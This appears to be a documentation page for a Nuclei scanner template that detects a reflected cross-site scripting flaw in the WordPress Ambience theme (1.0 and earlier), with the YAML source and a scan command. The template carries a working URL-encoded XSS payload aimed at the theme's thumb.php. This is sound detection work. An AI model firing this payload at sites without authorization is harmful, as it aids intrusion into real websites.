WordPress Ambience Theme <=1.0 - Cross-Site Scripting
ID: wp-ambience-xss
Severity: medium
Author: daffainfo
Tags: wp-plugin,wp,edb,wpscan,wordpress,xss
Description
Section titled “Description”WordPress Ambience Theme 1.0 and earlier was affected by a cross-site scripting vulnerability.
YAML Source
Section titled “YAML Source”id: wp-ambience-xss
info: name: WordPress Ambience Theme <=1.0 - Cross-Site Scripting author: daffainfo severity: medium description: | WordPress Ambience Theme 1.0 and earlier was affected by a cross-site scripting vulnerability. reference: - https://www.exploit-db.com/expl oits/38568 - https://wpscan.com/vulnerability/c465e5c1-fe43-40e9-894a-97b8ac462381 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cwe-id: CWE-80 metadata: max-request: 2 tags: wp-plugin,wp,edb,wpscan,wordpress,xss
flow: http(1) && http(2)
http: - method: GET path: - '{{BaseURL}}'
matchers: - type: word internal: true words: - '/wp-content/themes/ambience/'
- method: GET path: - '{{BaseURL}}/wp-content/themes/ambience/thumb.php?src=%3Cbody%20onload%3Dalert(1)%3E.jpg'
matchers-condition: and matchers: - type: word part: body words: - "<body onload=alert(1)>"
- type: word part: header words: - text/html
- type: status status: - 200# digest: 4b0a00483046022100d81e00383d579e9c1ecdec5eb4b76403ae04def2da921706d10d66484a8ee5a8022100fa35efc6fc29930c9baac4db0ab8fe66d72f968421b315cba14503d9f952ace7:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/vulnerabilities/wordpress/wp-ambience-xss.yaml"